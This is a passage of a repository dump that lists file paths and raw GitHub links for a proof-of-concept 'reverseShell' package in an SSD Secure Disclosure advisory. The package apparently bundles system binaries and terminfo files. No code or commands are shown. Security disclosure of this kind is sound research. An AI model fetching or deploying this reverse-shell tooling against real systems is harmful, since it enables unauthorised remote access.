https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/netstat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/nvram: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/nvram -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/sysctl: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/sysctl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/sbin/taskpolicy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/sbin/taskpolicy -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/.DS_Store -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+arrows: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+arrows -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+csr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+csr -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+cup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+cup -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+enq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+enq -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+erase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+erase -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idc -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+idl1 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+inittabs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+inittabs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local -------------------------------------------------------------------------------- /SSD Advisory 
- 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+local1 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+pp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+pp -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rca: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rca -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+rep -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgr 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrbold: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrbold -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrdim: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrdim -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrso: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrso -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrul: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+sgrul -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+tabs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD 
Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi+tabs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-color-2-emx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-color-2-emx -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-color-3-emx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-color-3-emx -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-emx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-emx -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-generic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-generic -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-m: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-m -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mini -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mr -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mtabs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-mtabs -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-nt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi-nt -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sys -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sys-old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sys-old -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sysk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi.sysk -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi43m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi43m -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/reverseShell/usr/share/terminfo/61/ansi77: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi77 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25-raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x25-raw -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x30: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x30 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x30-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x30-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x43: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x43 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x43-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x43-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x50: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x50 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x50-mono: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x50-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x60: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x60 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x60-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansi80x60-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansil -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansil-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansil-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansis: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansis -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansis-mono: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansis-mono -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansisysk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansisysk -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansiw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/61/ansiw -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/reverseShell/usr/share/terminfo/6c/linux-basic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-basic -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-c -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-c-nc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-c-nc -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-koi8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-koi8 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-koi8r: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-koi8r 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-lat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-lat -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-m -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-nic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-nic -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-vt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux-vt -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/6c/linux2.6.26: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 
4066/poc/reverseShell/usr/share/terminfo/6c/linux2.6.26 -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen+fkeys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen+fkeys -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-bce: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-bce -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-bce-s: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-bce-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-16color-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-bce: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-bce -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-bce-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-bce-s -------------------------------------------------------------------------------- /SSD Advisory - 
4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-256color-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-bce: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-bce -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-s -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-w: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen-w -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.linux 
-------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.mlterm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.mlterm -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.rxvt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.rxvt -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.teraterm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.teraterm -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-new: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-new -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/reverseShell/usr/share/terminfo/73/screen.xterm-r6: -------------------------------------------------------------------------------- 
